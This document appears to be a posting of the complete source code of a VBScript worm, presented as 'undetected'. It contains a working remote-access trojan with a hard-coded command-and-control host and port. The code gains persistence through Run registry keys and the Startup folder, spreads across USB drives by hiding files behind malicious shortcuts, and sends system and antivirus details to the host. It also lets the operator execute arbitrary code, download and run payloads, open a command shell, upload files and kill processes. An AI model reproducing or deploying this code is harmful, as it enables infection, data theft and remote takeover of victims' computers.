VBS WORM (no detectado) codigo fuente

1. '=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
2.  
3. host = "hattouma12.no-ip.biz"
4. port = 88
5. installdir = "%temp%"
6. lnkfile = true
7. lnkfolder = true
8.  
9. '=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=
10.  
11. dim shellobj
12. set shellobj = wscript.createobject("wscript.shell")
13. dim filesystemobj
14. set filesystemobj = createobject("scripting.filesystemobject")
15. dim httpobj
16. set httpobj = createobject("msxml2.xmlhttp")
17.  
18.  
19. '=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=
20.  
21. installname = wscript.scriptname
22. startup = shellobj.specialfolders ("startup") & "\"
23. installdir = shellobj.expandenvironmentstrings(installdir) & "\"
24. if not filesystemobj.folderexists(installdir) then  installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
25. spliter = "<|>"
26. sleep = 5000
27. dim response
28. dim cmd
29. dim param
30. info = ""
31. usbspreading = ""
32. startdate = ""
33. dim oneonce
34.  
35. '=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
36. on error resume next
37.  
38.  
39. instance
40. while true
41.  
42. install
43.  
44. response = ""
45. response = post ("is-ready","")
46. cmd = split (response,spliter)
47. select case cmd (0)
48. case "excecute"
49.       param = cmd (1)
50.       execute param
51. case "update"
52.       param = cmd (1)
53.       oneonce.close
54.       set oneonce =  filesystemobj.opentextfile (installdir & installname ,2, false)
55.       oneonce.write param
56.       oneonce.close
57.       shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
58.       wscript.quit
59. case "uninstall"
60.       uninstall
61. case "send"
62.       download cmd (1),cmd (2)
63. case "site-send"
64.       sitedownloader cmd (1),cmd (2)
65. case "recv"
66.       param = cmd (1)
67.       upload (param)
68. case  "enum-driver"
69.       post "is-enum-driver",enumdriver  
70. case  "enum-faf"
71.       param = cmd (1)
72.       post "is-enum-faf",enumfaf (param)
73. case  "enum-process"
74.       post "is-enum-process",enumprocess  
75. case  "cmd-shell"
76.       param = cmd (1)
77.       post "is-cmd-shell",cmdshell (param)  
78. case  "delete"
79.       param = cmd (1)
80.       deletefaf (param)
81. case  "exit-process"
82.       param = cmd (1)
83.       exitprocess (param)
84. case  "sleep"
85.       param = cmd (1)
86.       sleep = eval (param)        
87. end select
88.  
89. wscript.sleep sleep
90.  
91. wend
92.  
93.  
94. sub install
95. on error resume next
96. dim lnkobj
97. dim filename
98. dim foldername
99. dim fileicon
100. dim foldericon
101.  
102. upstart
103. for each drive in filesystemobj.drives
104.  
105. if  drive.isready = true then
106. if  drive.freespace  > 0 then
107. if  drive.drivetype  = 1 then
108.     filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
109.     if  filesystemobj.fileexists (drive.path & "\" & installname)  then
110.         filesystemobj.getfile(drive.path & "\"  & installname).attributes = 2+4
111.     end if
112.     for each file in filesystemobj.getfolder( drive.path & "\" ).Files
113.         if not lnkfile then exit for
114.         if  instr (file.name,".") then
115.             if  lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
116.                 file.attributes = 2+4
117.                 if  ucase (file.name) <> ucase (installname) then
118.                     filename = split(file.name,".")
119.                     set lnkobj = shellobj.createshortcut (drive.path & "\"  & filename (0) & ".lnk")
120.                     lnkobj.windowstyle = 7
121.                     lnkobj.targetpath = "cmd.exe"
122.                     lnkobj.workingdirectory = ""
123.                     lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
124.                     fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
125.                     if  instr (fileicon,",") = 0 then
126.                         lnkobj.iconlocation = file.path
127.                     else
128.                         lnkobj.iconlocation = fileicon
129.                     end if
130.                     lnkobj.save()
131.                 end if
132.             end if
133.         end if
134.     next
135.     for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
136.         if not lnkfolder then exit for
137.         folder.attributes = 2+4
138.         foldername = folder.name
139.         set lnkobj = shellobj.createshortcut (drive.path & "\"  & foldername & ".lnk")
140.         lnkobj.windowstyle = 7
141.         lnkobj.targetpath = "cmd.exe"
142.         lnkobj.workingdirectory = ""
143.         lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
144.         foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
145.         if  instr (foldericon,",") = 0 then
146.             lnkobj.iconlocation = folder.path
147.         else
148.             lnkobj.iconlocation = foldericon
149.         end if
150.         lnkobj.save()
151.     next
152. end If
153. end If
154. end if
155. next
156. err.clear
157. end sub
158.  
159. sub uninstall
160. on error resume next
161. dim filename
162. dim foldername
163.  
164. shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
165. shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
166. filesystemobj.deletefile startup & installname ,true
167. filesystemobj.deletefile wscript.scriptfullname ,true
168.  
169. for  each drive in filesystemobj.drives
170. if  drive.isready = true then
171. if  drive.freespace  > 0 then
172. if  drive.drivetype  = 1 then
173.     for  each file in filesystemobj.getfolder ( drive.path & "\").files
174.          on error resume next
175.          if  instr (file.name,".") then
176.              if  lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
177.                  file.attributes = 0
178.                  if  ucase (file.name) <> ucase (installname) then
179.                      filename = split(file.name,".")
180.                      filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
181.                  else
182.                      filesystemobj.deletefile (drive.path & "\" & file.name)
183.                  end If
184.              else
185.                  filesystemobj.deletefile (file.path)
186.              end if
187.          end if
188.      next
189.      for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
190.          folder.attributes = 0
191.      next
192. end if
193. end if
194. end if
195. next
196. wscript.quit
197. end sub
198.  
199. function post (cmd ,param)
200.  
201. post = param
202. httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
203. httpobj.setrequestheader "user-agent:",information
204. httpobj.send param
205. post = httpobj.responsetext
206. end function
207.  
208. function information
209. on error resume next
210. if  inf = "" then
211.     inf = hwid & spliter
212.     inf = inf  & shellobj.expandenvironmentstrings("%computername%") & spliter
213.     inf = inf  & shellobj.expandenvironmentstrings("%username%") & spliter
214.  
215.     set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
216.     set os = root.execquery ("select * from win32_operatingsystem")
217.     for each osinfo in os
218.        inf = inf & osinfo.caption & spliter  
219.        exit for
220.     next
221.     inf = inf & "plus" & spliter
222.     inf = inf & security & spliter
223.     inf = inf & usbspreading
224.     information = inf  
225. else
226.     information = inf
227. end if
228. end function
229.  
230.  
231. sub upstart ()
232. on error resume Next
233.  
234. shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
235. shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B "  & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
236. filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
237. filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true
238.  
239. end sub
240.  
241.  
242. function hwid
243. on error resume next
244.  
245. set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
246. set disks = root.execquery ("select * from win32_logicaldisk")
247. for each disk in disks
248.     if  disk.volumeserialnumber <> "" then
249.         hwid = disk.volumeserialnumber
250.         exit for
251.     end if
252. next
253. end function
254.  
255.  
256. function security
257. on error resume next
258.  
259. security = ""
260.  
261. set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
262. set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
263. for each objitem in colitems
264.     versionstr = split (objitem.version,".")
265. next
266. versionstr = split (colitems.version,".")
267. osversion = versionstr (0) & "."
268. for  x = 1 to ubound (versionstr)
269.      osversion = osversion &  versionstr (i)
270. next
271. osversion = eval (osversion)
272. if  osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"
273.  
274. set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
275. Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)
276.  
277. for each objantivirus in colantivirus
278.     security  = security  & objantivirus.displayname & " ."
279. next
280. if security  = "" then security  = "nan-av"
281. end function
282.  
283.  
284. function instance
285. on error resume next
286.  
287. usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
288. if usbspreading = "" then
289.    if lcase ( mid(wscript.scriptfullname,2)) = ":\" &  lcase(installname) then
290.       usbspreading = "true - " & date
291.       shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
292.    else
293.       usbspreading = "false - " & date
294.       shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
295.  
296.    end if
297. end If
298.  
299.  
300.  
301. upstart
302. set scriptfullnameshort =  filesystemobj.getfile (wscript.scriptfullname)
303. set installfullnameshort =  filesystemobj.getfile (installdir & installname)
304. if  lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
305.     shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
306.     wscript.quit
307. end If
308. err.clear
309. set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
310. if  err.number > 0 then wscript.quit
311. end function
312.  
313.  
314. sub sitedownloader (fileurl,filename)
315.  
316. strlink = fileurl
317. strsaveto = installdir & filename
318. set objhttpdownload = createobject("msxml2.xmlhttp" )
319. objhttpdownload.open "get", strlink, false
320. objhttpdownload.send
321.  
322. set objfsodownload = createobject ("scripting.filesystemobject")
323. if  objfsodownload.fileexists (strsaveto) then
324.     objfsodownload.deletefile (strsaveto)
325. end if
326.  
327. if objhttpdownload.status = 200 then
328.    dim  objstreamdownload
329.    set  objstreamdownload = createobject("adodb.stream")
330.    with objstreamdownload
331.         .type = 1
332.         .open
333.         .write objhttpdownload.responsebody
334.         .savetofile strsaveto
335.         .close
336.    end with
337.    set objstreamdownload = nothing
338. end if
339. if objfsodownload.fileexists(strsaveto) then
340.    shellobj.run objfsodownload.getfile (strsaveto).shortpath
341. end if
342. end sub
343.  
344. sub download (fileurl,filedir)
345.  
346. if filedir = "" then
347.    filedir = installdir
348. end if
349.  
350. strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
351. set objhttpdownload = createobject("msxml2.xmlhttp")
352. objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
353. objhttpdownload.send ""
354.      
355. set objfsodownload = createobject ("scripting.filesystemobject")
356. if  objfsodownload.fileexists (strsaveto) then
357.     objfsodownload.deletefile (strsaveto)
358. end if
359. if  objhttpdownload.status = 200 then
360.     dim  objstreamdownload
361.     set  objstreamdownload = createobject("adodb.stream")
362.     with objstreamdownload
363.          .type = 1
364.          .open
365.          .write objhttpdownload.responsebody
366.          .savetofile strsaveto
367.          .close
368.     end with
369.     set objstreamdownload  = nothing
370. end if
371. if objfsodownload.fileexists(strsaveto) then
372.    shellobj.run objfsodownload.getfile (strsaveto).shortpath
373. end if
374. end sub
375.  
376.  
377. function upload (fileurl)
378.  
379. dim  httpobj,objstreamuploade,buffer
380. set  objstreamuploade = createobject("adodb.stream")
381. with objstreamuploade
382.      .type = 1
383.      .open
384.      .loadfromfile fileurl
385.      buffer = .read
386.      .close
387. end with
388. set objstreamdownload = nothing
389. set httpobj = createobject("msxml2.xmlhttp")
390. httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
391. httpobj.send buffer
392. end function
393.  
394.  
395. function enumdriver ()
396.  
397. for  each drive in filesystemobj.drives
398. if   drive.isready = true then
399.      enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
400. end if
401. next
402. end Function
403.  
404. function enumfaf (enumdir)
405.  
406. enumfaf = enumdir & spliter
407. for  each folder in filesystemobj.getfolder (enumdir).subfolders
408.      enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
409. next
410.  
411. for  each file in filesystemobj.getfolder (enumdir).files
412.      enumfaf = enumfaf & file.name & "|" & file.size  & "|" & "f" & "|" & file.attributes & spliter
413.  
414. next
415. end function
416.  
417.  
418. function enumprocess ()
419.  
420. on error resume next
421.  
422. set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
423. set colitems = objwmiservice.execquery("select * from win32_process",,48)
424.  
425. dim objitem
426. for each objitem in colitems
427.     enumprocess = enumprocess & objitem.name & "|"
428.     enumprocess = enumprocess & objitem.processid & "|"
429.     enumprocess = enumprocess & objitem.executablepath & spliter
430. next
431. end function
432.  
433. sub exitprocess (pid)
434. on error resume next
435.  
436. shellobj.run "taskkill /F /T /PID " & pid,7,true
437. end sub
438.  
439. sub deletefaf (url)
440. on error resume next
441.  
442. filesystemobj.deletefile url
443. filesystemobj.deletefolder url
444.  
445. end sub
446.  
447. function cmdshell (cmd)
448.  
449. dim httpobj,oexec,readallfromany
450.  
451. set oexec = shellobj.exec ("%comspec% /c " & cmd)
452. if not oexec.stdout.atendofstream then
453.    readallfromany = oexec.stdout.readall
454. elseif not oexec.stderr.atendofstream then
455.    readallfromany = oexec.stderr.readall
456. else
457.    readallfromany = ""
458. end if
459.  
460. cmdshell = readallfromany
461. end function